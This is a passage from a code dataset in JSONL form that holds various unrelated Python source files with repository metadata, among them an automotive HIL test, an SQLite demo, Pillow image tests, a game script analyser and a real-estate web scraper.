testresult.append([\"\\xa0 WH sendet keine Botschaften nach 25 min \", \"FAILED\"])\n\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer1 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1,\n descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1,\n descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n # func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [1], [],\n # descr=\"NM_Waehlhebel_FCAB:12_GearSelector\"),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, 1,\n descr=\"NM_Waehlhebel_NM_aktiv_Tmin:Mindestaktivzeit\"),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, 0,\n descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv\")\n ]\n\n testresult += [\n func_nm.checkNMFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [10, 11], [],\n descr=\"Prüfe NM_Waehlhebel_FCAB:10_Powertrain, NM_Waehlhebel_FCAB:11_Chassis == 1, andere sind 0\"),\n ]\n\n # test step 6\n testresult.append([\"\\x0a6. Schalte Senden von RX Signalen (HiL -->ECU) und Sende VDSO_Vx3d = 32838 (1,008 km/h)\", \"\"])\n func_nm.hil_ecu_tx_off_state(\"an\")\n descr, verdict = func_gs.setVelocity_kmph(1.008, True) # changed the velocity timer from 0.04ms to forever\n testresult.append([descr, verdict])\n\n # test step 7\n testresult.append([\"\\x0a7. 1 min warten...nach 26 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer2 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1,\n descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n # func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [1], [],\n # descr=\"NM_Waehlhebel_FCAB:12_GearSelector\"),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1,\n descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, nominal_status=0,\n descr=\"NM_Waehlhebel_NM_aktiv_Tmin:inaktiv\", ticket_id='Fehler Id:EGA-PRM-15'),\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, 0,\n descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv\")\n ]\n\n testresult += [\n func_nm.checkNMFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [10, 11], [],\n descr=\"Prüfe NM_Waehlhebel_FCAB:10_Powertrain, NM_Waehlhebel_FCAB:11_Chassis == 1, andere sind 0\"),\n ]\n\n # test step 8\n testresult.append([\"\\x0a8. VDSO_Vx3d = 32766 senden\", \"\"])\n descr, verdict = func_gs.setVelocity_kmph(0)\n testresult.append([\"\\xa0\" + descr, verdict])\n time.sleep(0.025)\n\n # test step 9\n testresult.append([\"\\x0a9. 1 min warten...nach 27 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe folgende Signale werden vom Wählhebel nach Ablauf Timer2 gesendet\", \"\"])\n testresult += [\n basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_CBV_AWB__value, 1, descr=\"NM_Waehlhebel_CBV_AWB: Aktiver_WakeUp\"),\n # basic_tests.checkStatus(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value, 0, descr=\"NM_Waehlhebel_FCAB: Init\"),\n func_nm.checkFcabBitwise(hil.NM_Waehlhebel__NM_Waehlhebel_FCAB__value.get(), [], [1], descr=\"NM_Waehlhebel_FCAB:CAR wakeup = 0\", ticket_id='Fehler-Id: EGA-PRM-232'),\n basic_tests.checkStatus(hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value, 1, descr=\"WH_Zustand_N_Haltephase_2: aktiv_Timer_laeuft\"),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Waehlhebel_NM_aktiv_Tmin__value, nominal_status=0, descr=\"NM_Waehlhebel_NM_aktiv_Tmin:inaktiv\", ticket_id='Fehler Id:EGA-PRM-15'),\n _checkStatus(current_status=hil.NM_Waehlhebel__NM_Aktiv_N_Haltephase_abgelaufen__value, nominal_status=0, descr=\"NM_Aktiv_N_Haltephase_abgelaufen:Inaktiv ist\", ticket_id='Fehler Id:EGA-PRM-15')\n ]\n\n # TEST POST CONDITIONS ####################################################\n testresult.append([\"[-] Test Nachbedingungen\", \"\"])\n testresult.append([\"[+] ECU ausschalten\", \"\"])\n testenv.shutdownECU()\n\n # cleanup #################################################################\n # hil = None\n\nfinally:\n # #########################################################################\n testenv.breakdown()\n del (testenv)\n","repo_name":"mdabdulkarim04/Wahlhebel","sub_path":"Python/TestPool/N_HaltePhase/Verlaengerung_N_Haltephase_Timer2.py","file_name":"Verlaengerung_N_Haltephase_Timer2.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17466546954","text":"from krakenbot.api import api_client\nfrom krakenbot.constants import ROUND_PRECISION\n\n\nclass Spread:\n def __init__(self, pair):\n self.pair = pair\n self.fetch_spread()\n\n def fetch_spread(self):\n response = api_client.query_public('Spread', {'pair': '{}{}'.format(self.pair.crypto, self.pair.fiat)})\n self.spread = response['result'][str(self.pair)]\n\n @property\n def last_average(self):\n last_spread = self.spread[-1]\n spread_min = round(float(last_spread[1]), ROUND_PRECISION)\n spread_max = round(float(last_spread[2]), ROUND_PRECISION)\n average = (spread_min + spread_max) / 2 # average value (min+max)/2\n return average\n","repo_name":"rocambolesque/krakenbot","sub_path":"krakenbot/models/spread.py","file_name":"spread.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4030459732","text":"import random\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\n\ndef seed_all(seed):\n random.seed(seed) # python random generator\n np.random.seed(seed) # numpy random generator\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef draw_scalar_field2D(arr, vmin=None, vmax=None, cmap=None):\n multi = max(arr.shape[0] // 512, 1)\n fig, ax = plt.subplots(figsize=(5 * multi, 5 * multi))\n cax1 = ax.matshow(arr, vmin=vmin, vmax=vmax, cmap=cmap)\n fig.colorbar(cax1, ax=ax, fraction=0.046, pad=0.04)\n fig.tight_layout()\n return fig\n","repo_name":"Sin3DM/Sin3DM","sub_path":"src/utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"19"} +{"seq_id":"25272499246","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n'''\n数据库 - SQLite\n'''\n\nimport sqlite3, os\n\ndatabase = 'test.db'\n\ndef writeDataToDB(id, name):\n\n # 连接到SQLite数据库\n # 数据库文件是test.db\n # 如果文件不存在,会自动在当前目录创建:\n conn = sqlite3.connect(database)\n\n # 创建一个Cursor:\n cursor = conn.cursor()\n\n # 执行一条SQL语句,创建user表:\n tablename = 'user'\n cursor.execute('create table if not exists %s (id varchar(20) primary key, name varchar(20))' % (tablename, ))\n\n # 继续执行一条SQL语句,插入一条记录:\n cursor.execute('insert into user (id, name) values (?, ?)', (id, name))\n\n # 通过rowcount获得插入的行数:\n print('row count', cursor.rowcount)\n\n # 关闭Cursor:\n cursor.close()\n\n # 提交事务:\n conn.commit()\n\n # 关闭Connection:\n conn.close()\n\ndef readDataFromDB():\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n # 执行查询语句:\n cursor.execute('select * from user where id=?', ('1',))\n\n # 获得查询结果集:\n values = cursor.fetchall()\n\n cursor.close()\n\n return values\n\n\nwriteDataToDB(1, 'Shannon')\nprint(readDataFromDB())\nos.remove(database)","repo_name":"ShannonChenCHN/APythonTour","sub_path":"Examples/Database/040.py","file_name":"040.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73070124843","text":"import pytest\n\nfrom PIL import Image, WmfImagePlugin\n\nfrom .helper import assert_image_similar_tofile, hopper\n\n\ndef test_load_raw():\n # Test basic EMF open and rendering\n with Image.open(\"Tests/images/drawing.emf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n # Currently, support for WMF/EMF is Windows-only\n im.load()\n # Compare to reference rendering\n assert_image_similar_tofile(im, \"Tests/images/drawing_emf_ref.png\", 0)\n\n # Test basic WMF open and rendering\n with Image.open(\"Tests/images/drawing.wmf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n # Currently, support for WMF/EMF is Windows-only\n im.load()\n # Compare to reference rendering\n assert_image_similar_tofile(im, \"Tests/images/drawing_wmf_ref.png\", 2.0)\n\n\ndef test_load():\n with Image.open(\"Tests/images/drawing.emf\") as im:\n if hasattr(Image.core, \"drawwmf\"):\n assert im.load()[0, 0] == (255, 255, 255)\n\n\ndef test_register_handler(tmp_path):\n class TestHandler:\n methodCalled = False\n\n def save(self, im, fp, filename):\n self.methodCalled = True\n\n handler = TestHandler()\n original_handler = WmfImagePlugin._handler\n WmfImagePlugin.register_handler(handler)\n\n im = hopper()\n tmpfile = str(tmp_path / \"temp.wmf\")\n im.save(tmpfile)\n assert handler.methodCalled\n\n # Restore the state before this test\n WmfImagePlugin.register_handler(original_handler)\n\n\ndef test_load_float_dpi():\n with Image.open(\"Tests/images/drawing.emf\") as im:\n assert im.info[\"dpi\"] == 1423.7668161434979\n\n\ndef test_load_set_dpi():\n with Image.open(\"Tests/images/drawing.wmf\") as im:\n assert im.size == (82, 82)\n\n if hasattr(Image.core, \"drawwmf\"):\n im.load(144)\n assert im.size == (164, 164)\n\n assert_image_similar_tofile(im, \"Tests/images/drawing_wmf_ref_144.png\", 2.1)\n\n\n@pytest.mark.parametrize(\"ext\", (\".wmf\", \".emf\"))\ndef test_save(ext, tmp_path):\n im = hopper()\n\n tmpfile = str(tmp_path / (\"temp\" + ext))\n with pytest.raises(OSError):\n im.save(tmpfile)\n","repo_name":"python-pillow/Pillow","sub_path":"Tests/test_file_wmf.py","file_name":"test_file_wmf.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":11252,"dataset":"github-code","pt":"19"} +{"seq_id":"6832129607","text":"import json\nimport boto3\nfrom uuid import uuid4\n\n\n# import requests\n\n\ndef lambda_handler(event, context):\n sfnclient = boto3.client('stepfunctions')\n count = 0\n\n for record in event['Records']:\n id=str(record[\"body\"])\n print('Message Body: ', id)\n\n input_dict = {\n 'id' : id\n }\n print(json.dumps(input_dict))\n\n response = sfnclient.start_execution(\n stateMachineArn = 'arn:aws-cn:states:cn-northwest-1:402202783068:stateMachine:VideoProcessStateMachine-oyOOuVQvTdLe',\n name = '{}-{}'.format(str(id), str(uuid4())),\n input = json.dumps(input_dict))\n\n print(response)\n \n count = count + 1\n \n print(\"Triggered Workflow: \", count)\n\n\n\n\n\n ","repo_name":"linjungz/serverless-processing-demo","sub_path":"functions/trigger/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"6100740128","text":"import pygame\nfrom lib.plougame import SubPage, Form, TextBox, ScrollList, InputText, Button, Cadre, Font, C\nfrom game.game import Game\nfrom data.spec import Spec\nimport numpy as np\nimport importlib, traceback, time, functools\n\nclass ScriptAnalyser(SubPage):\n\n def __init__(self, pos, offline=False):\n \n states = ['base']\n\n components = Spec.formatter.get_components('ui/data/script_analyser.json')\n\n super().__init__(states, components, pos)\n\n self.offline = offline\n self.client = None\n self.n_tb_lines = 12\n self.script_status = False\n\n # create game object -> test script\n self.game = Game(None, connected=False)\n\n # store script module -> know if need to load or reload module\n self.script_module = None\n\n self.set_states_components(None, ['cadre', 'title', 'b analyse', 'b load', 'b save', 't status'])\n \n self.add_button_logic('b analyse', self.b_analyse)\n self.add_button_logic('b save', self.b_save)\n self.add_button_logic('b load', self.b_load)\n\n def in_base(self):\n '''\n Set the script status, \n Reset texts\n '''\n self.reset()\n\n # don't use context manager -> keep status stored for menu\n status = self.client.in_data['scst']\n\n if status != None:\n self.script_status = bool(status)\n\n self.set_status_text()\n\n def b_save(self):\n '''Send script to server, set info text'''\n \n # get script\n with open('script.py', 'r') as file:\n script = file.read()\n\n if self.offline:\n Spec.update_local_profil(self.client.username,\n 'script', script.split('\\n'))\n Spec.update_local_profil(self.client.username,\n 'script status', self.script_status)\n else:\n self.client.send_script(script)\n self.client.send_script_status(self.script_status)\n \n self.set_status_text()\n\n # set info text\n self.change_display_state('t info', True)\n self.set_text('t info', \"Script saved.\")\n self.set_color('t info', C.DARK_GREEN)\n\n def b_load(self):\n '''\n Load the server script into the script.py file\n '''\n script = self.client.in_data['sc']\n\n with open('script.py', 'w') as file:\n file.write(script)\n\n # set info text\n self.change_display_state('t info', True)\n self.set_text('t info', f\"Script loaded into script.py.\")\n self.set_color('t info', C.DARK_GREEN)\n\n def b_analyse(self):\n\n self.reset()\n\n if self.offline:\n success = True\n else:\n success = self.analyse_cheat()\n \n success &= self.analyse_errors()\n\n self.script_status = success\n\n if success:\n self.set_success_text()\n\n def analyse_cheat(self):\n '''\n Try to find if the script contains a cheating attempt\n '''\n # load script\n with open('script.py', 'r') as file:\n script = file.read()\n\n self.client.send_script(script, analysis=True)\n\n # wait for server response\n while True:\n\n time.sleep(0.1)\n\n with self.client.get_data('rsca') as response:\n \n if response == None: \n continue\n\n if response == 0:\n self.set_error_text('cheat')\n \n return bool(response)\n\n def analyse_errors(self):\n '''\n Try to find errors in script.\n '''\n is_error = False\n\n # try import script\n try:\n if not self.script_module is None:\n self.script_module = importlib.reload(self.script_module)\n else:\n self.script_module = importlib.import_module('script')\n \n except Exception as e:\n \n is_error = True\n\n # get traceback\n tb = e.__traceback__\n tb_lines = traceback.extract_tb(tb).format()\n\n # add last line with error type and message\n tb_lines.append(f'{e.__class__.__name__}: {e}')\n\n if is_error:\n self.set_error('import', tb_lines)\n return False\n \n # get grid\n grid = self.client.in_data['sh']\n\n # try runtime script\n error_type, tb_lines = self.game.test_script(grid)\n\n if error_type == 'runtime':\n self.set_error('runtime', tb_lines)\n return False\n\n elif error_type == 'execution time':\n self.set_error_text('execution time')\n return False\n\n elif error_type == 'init':\n self.set_error('init', tb_lines)\n return False\n\n return True\n\n def set_success_text(self):\n '''\n Set a success message on the \"t info\" component\n '''\n # stop displaying potential traceback\n self.change_display_state('title tb', False)\n self.change_display_state('t tb', False)\n\n # set succes message\n self.change_display_state('t info', True)\n self.set_text('t info', \"Script passed tests succesfully!\")\n self.set_color('t info', C.DARK_GREEN)\n\n def set_error(self, error_type, tb_lines):\n '''\n Set the error text and traceback text. \n '''\n self.set_error_text(error_type)\n self.set_traceback_text(tb_lines)\n\n def set_error_text(self, error_type):\n '''\n Set the text and color of text_error\n '''\n self.change_display_state('t info', True)\n\n if error_type == 'import':\n msg = \"Error occured while importing script.\"\n \n elif error_type == \"runtime\":\n msg = \"Error occured while testing main().\"\n \n elif error_type == 'init':\n msg = 'Error occured while testing init().'\n\n elif error_type == 'cheat':\n msg = 'Potential maliscious piece of code detected.'\n\n elif error_type == 'execution time':\n msg = 'Execution time is too long.'\n\n self.set_text('t info', msg)\n self.set_color('t info', C.DARK_RED)\n\n def set_traceback_text(self, tb_lines):\n '''\n Set the text of text_traceback\n '''\n self.change_display_state('title tb', True)\n self.change_display_state('t tb', True)\n\n # first filter traceback lines\n # get first line that is about script.py\n for i, line in enumerate(tb_lines):\n if 'script.py' in line:\n idx = i\n break\n \n tb_lines = tb_lines[idx:]\n\n # keep only relative path\n root_path = \"/home/alexandre/Documents/python/game/CodeShip/\"\n\n for i in range(len(tb_lines)):\n tb_lines[i] = tb_lines[i].replace(root_path, '')\n \n text = functools.reduce(lambda x,y:x+y, tb_lines)\n\n self.set_text('t tb', text)\n \n def set_status_text(self):\n '''\n Set the text of text_status depending on the current status\n '''\n if self.script_status:\n self.set_text('t status', 'Ready.')\n self.set_color('t status', C.DARK_GREEN)\n else:\n self.set_text('t status', 'Not ready.')\n self.set_color('t status', C.DARK_RED)\n \n def reset(self):\n '''\n Reset the texts\n '''\n self.change_display_state('t info', False)\n self.change_display_state('t tb', False)\n self.change_display_state('title tb', False)","repo_name":"Plouc314/CodeShip","sub_path":"CodeShip/ui/script_analyser.py","file_name":"script_analyser.py","file_ext":"py","file_size_in_byte":7615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73022036844","text":"import sys\n\nsys.setrecursionlimit(200000000)\n\nN, M, K = map(int, input().split())\na = list(map(int, input().split()))\nb = list(map(int, input().split()))\nmax_num = 0\n\ndef dfs(curr_a, curr_b, choice, time_required, count):\n global max_num\n if choice == 0:\n if curr_a >= N - 1:\n if max_num < count:\n max_num = count\n return\n else:\n curr_a += 1\n time_required += a[curr_a]\n else:\n if curr_b >= M - 1:\n if max_num < count:\n max_num = count\n return\n else:\n curr_b += 1\n time_required += b[curr_b]\n if time_required > K:\n return\n count += 1\n if max_num < count:\n max_num = count\n dfs(curr_a, curr_b, 0, time_required, count)\n dfs(curr_a, curr_b, 1, time_required, count)\n\n\nif sum(a) + sum(b) <= K:\n print(N + M)\nelse:\n curr_a = -1\n curr_b = -1\n time_required = 0\n count = 0\n dfs(curr_a, curr_b, 0, time_required, count)\n curr_a = -1\n curr_b = -1\n time_required = 0\n count = 0\n dfs(curr_a, curr_b, 1, time_required, count)\n print(max_num)\n","repo_name":"hideki-okada/atcoder","sub_path":"ABC/172/tsundoku.py","file_name":"tsundoku.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73069109803","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\nimport junction.devices.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"devices\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"device\",\n name=\"verification_code_expires_at\",\n field=models.DateTimeField(\n default=junction.devices.models.expiry_time,\n verbose_name=\"Verification Code Expires At\",\n ),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name=\"device\",\n name=\"verification_code_sent_at\",\n field=models.DateTimeField(\n auto_now_add=True, verbose_name=\"Verification Code Sent At\"\n ),\n preserve_default=True,\n ),\n ]\n","repo_name":"pythonindia/junction","sub_path":"junction/devices/migrations/0002_auto_20160623_1448.py","file_name":"0002_auto_20160623_1448.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"19"} +{"seq_id":"39367149769","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\n\ndef scrap_category(category):\n links = []\n total_pages_int = 1\n\n base_response = requests.get(category.url)\n base_soup = BeautifulSoup(base_response.text, \"html.parser\")\n li_total_pages_array = base_soup.select(\"li.current\")\n\n if len(li_total_pages_array) > 0:\n li_total_pages = (li_total_pages_array)[0].text\n array_string = li_total_pages.split()\n \n #print(array_string)\n total_pages_str = array_string[len(array_string) - 1]\n total_pages_int = int(total_pages_str)\n\n min_page = 1\n max_page = (total_pages_int + 1)\n\n # max_page est exclusif\n for i in range(min_page, max_page):\n # modifier l'url suivante pour s'adapter au paramètre\n #url = f\"https://books.toscrape.com/catalogue/category/books/mystery_3/page-{str(i)}.html\"\n url = category.url\n\n # checker le nom des fonctions\n if int(max_page) == 2:\n url=category.url\n else:\n url = url.replace(url,category.url[0:int(len(category.url)-10)])\n url += f\"page-{str(i)}.html\"\n \n \n print(url)\n\n # print(url)\n response = requests.get(url)\n\n if response.ok:\n soup = BeautifulSoup(response.text, \"html.parser\")\n #links = [] # liens de chaque bouquin\n h3 = soup.find_all('h3')\n\n for h in h3:\n partial_link = h.find('a').get(\"href\")[9:]\n\n complete_link = 'https://books.toscrape.com/catalogue/' + partial_link\n\n #print(complete_link)\n links.append(complete_link)\n return links\n","repo_name":"MAM95190/projet_2","sub_path":"one_category_module.py","file_name":"one_category_module.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24490416637","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('my_books', views.my_books, name='my_books'),\n path('add_book', views.add_book, name=\"add_book\"),\n path('edit_book/', views.edit_book, name=\"edit_book\"),\n path('book_detail/', views.book_detail, name=\"book_detail\"),\n]","repo_name":"legend-king/Book-List-App","sub_path":"books/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20052514416","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 18 22:55:58 2016\r\n\r\nAlgorithm:\r\n\r\n 1. call init by main\r\n 2. call update every iteration, updating the list\r\n 3. call eof_shutdown() to calculate the computational intensive stuff\r\n and print everything of interest\r\n\r\n@author: Mats Richter\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib as plt\r\nimport csv as c\r\n\r\nclass Toolbox:\r\n\r\n def __init__(self,instruction_dict):\r\n #set starting values\r\n self.account_val_list = [instruction_dict['account_val']]\r\n self.date_list = list()\r\n \r\n #update self.parameters (primarily lists an not compute-intensive stuff)\r\n def update(self,instruction_dict,date = None, sharpe=False): \r\n self.account_val_list.append(instruction_dict['account_val'])\r\n# self.account_cap_list.append(instruction_dict['account_val']-instruction_dict['capital'])\r\n self.date_list.append(instruction_dict['tstep'])\r\n return\r\n \r\n #save the profit graph as CSV \r\n def save_csv(self,message,instruction_dict):\r\n f = open('stat_dump/'+message+'_'+instruction_dict['symbol']+\".csv\",'w')\r\n writer = c.writer(f,delimiter=' ')\r\n# writer2 = c.writer(self.csv_inv,delimiter=' ')\r\n for i in range(len(self.date_list)): \r\n writer.writerow([self.date_list[i],self.account_val_list[i]]) \r\n# \r\n f.close() \r\n return","repo_name":"MLRichter/AutoBuffett","sub_path":"Statrec_Toolbox_Object.py","file_name":"Statrec_Toolbox_Object.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"36"} +{"seq_id":"32322174696","text":"from PyPDF2 import PdfFileWriter, PdfFileReader\n\n# input:\n# journal: the name of the file containing the journal to be parsed\n# fileName: the name of the file the function should write to\n# startPage: the page number where the split should begin (this will be included in the output)\n# endPage: the page number where the split should end (this will be included in the output)\n# preconditions:\n# journal should be a real pdf file\n# fileName should be a non-empty string\n# startPage should be less than or equal to endPage and greater than 0\n# endPage should be greater than or equal to startPage and less than or equal to the number of pages in the document\n# the \"first\" page is page 1, not page 0 -- if the split starts at the beginning of the document and ends on the 3rd page, then startPage=1 and endPage=3\n# **NOT startPage=0 and endPage=2**\n# This is to allow startPage and endPage to be taken directly from user input\n# postconditions:\n# this function will write the split pdf to a file with the name [fileName] in the local directory\n# if [fileName] already contains information, it will be overwritten\n\ndef split_article(journal, fileName, startPage, endPage):\n fullPdf = PdfFileReader(open(journal, \"rb\"))\n output = PdfFileWriter()\n for i in range(fullPdf.numPages):\n if (i + 1 >= startPage and i + 1 <= endPage):\n output.addPage(fullPdf.getPage(i))\n outputStream = file(fileName, \"wb\")\n output.write(outputStream)\n outputStream.close()\n","repo_name":"jemisonf/OJS_scripts","sub_path":"split_article.py","file_name":"split_article.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"32137312452","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[73]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas \n\nl = []\nbase_url = \"http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s=\"\npg_nr = soup.find_all(\"a\" , {\"class\" : \"Page\"})[-1].text\nfor page in range(0,int(pg_nr)*10,10):\n header_str = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'}\n r = requests.get(base_url + str(page) + \".html\" , headers = header_str)\n c = r.content\n soup = BeautifulSoup(c, \"html.parser\")\n a = soup.find_all(\"div\",{\"class\":\"propertyRow\"})\n for item in a:\n d = {}\n d[\"Price\"] = item.find(\"h4\",{\"class\",\"propPrice\"}).text.strip()\n d[\"Address\"] = item.find_all(\"span\",{\"class\",\"propAddressCollapse\"})[0].text\n try:\n d[\"Locality\"] = item.find_all(\"span\",{\"class\",\"propAddressCollapse\"})[1].text\n except:\n d[\"Locality\"] = \"None\"\n try:\n d[\"Beds\"] = item.find(\"span\",{\"class\",\"infoBed\"}).find(\"b\").text.strip()\n except:\n d[\"Beds\"] = \"None\"\n try:\n d[\"SqFt.\"] = item.find(\"span\",{\"class\",\"infoSqFt\"}).find(\"b\").text.strip()\n except:\n d[\"SqFt.\"] = \"None\"\n try:\n d[\"Full Bath\"] = item.find(\"span\",{\"class\",\"infoValueFullBath\"}).find(\"b\").text.strip()\n except:\n d[\"Full Bath\"] = \"None\"\n try:\n d[\"Half Bath\"] = item.find(\"span\",{\"class\",\"infoValueHalfBath\"}).find(\"b\").text.strip()\n except:\n d[\"Half Bath\"] = \"None\"\n for column in item.find_all(\"div\",{\"class\":\"columnGroup\"}):\n for feature_group,feature_name in zip(column.find_all(\"span\",{\"class\":\"featureGroup\"}) ,column.find_all(\"span\",{\"class\":\"featureName\"})):\n if \"Lot Size\" in feature_group.text:\n d[\"Lot Size\"] = feature_name.text\n l.append(d)\n \ndf = pandas.DataFrame(l)\ndf.to_csv(\"Outputf.csv\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Akshara3129/WebScrapper","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8169471699","text":"import pytest\n\nfrom sfapi_client import Client, SfApiError\n\n\n@pytest.mark.public\ndef test_no_creds():\n with Client() as client:\n assert client is not None\n\n\n@pytest.mark.public\ndef test_no_creds_auth_required(test_machine):\n with Client() as client:\n machine = client.compute(test_machine)\n with pytest.raises(SfApiError):\n machine.jobs()\n","repo_name":"NERSC/sfapi_client","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"36"} +{"seq_id":"37909194501","text":"import random\nimport tensorflow as tf\nfrom tensorflow.keras import layers, Sequential, losses, models\nfrom numpy import *\nimport csv\nimport math\nimport random\nclass vector:\n def __init__(self, x, y):\n self.x=x\n self.y=y\n self.length=(x*x+y*y)**0.5\n def cross(self, other):\n return self.x*other.y-self.y*other.x;\n def angle(self, other):\n ret= math.asin(cross(other))\n if ret<0:\n ret+=4*math.asin(1)\n return ret\n \nclass data_converter:\n def __init__(self):\n return\n def coord_to_angle(self, matrix):\n return self.point_to_angle(self.coord_to_angle(matrix))\n def point_to_angle(self, matrix):\n ret=[]\n for line in matrix:\n li=[]\n for i in range(len(line)):\n for j in range(i+1,len(line)):\n li.append(line[i].angle(line[j])) \n ret.append(array(li))\n return array(ret)\n def coord_to_point(self, matrix):\n ret=[]\n for line in matrix:\n li=[]\n i=0\n while iState: %{text}'+\\\n '
        Total deforestation in km^2: %{z}
        '\nfig.data[1].hovertemplate = 'Area deforested in km^2: %{text:.4f}'+\\\n '
        '\nfig.update_layout(mapbox_style = \"streets\")\nfig.update_layout(showlegend=True, legend=dict(x=0.7, y=1.17))\n\ncolumn2 = dbc.Col(\n [\n dcc.Graph(figure=fig),\n ],\n md=6,\n)\n\nlayout = dbc.Row([column1, column2])","repo_name":"tigju/Amazon-Deforestation-Prediction-App","sub_path":"pages/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"29413136157","text":"import numpy as np\nimport cv2\n\nimg = np.zeros((512, 512, 3), np.uint8)\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Frank AK', (10, 500), font, 4, (255, 255, 255), 2, cv2.LINE_AA)\n\n\ncv2.imshow('Text', img)\n\ncv2.waitKey(0)\n\n\ncv2.destroyAllWindows()\n","repo_name":"land-pack/opencv-example","sub_path":"basic/simple_draw_text.py","file_name":"simple_draw_text.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"70864682984","text":"from typing import List\n\n\nclass Solution:\n def 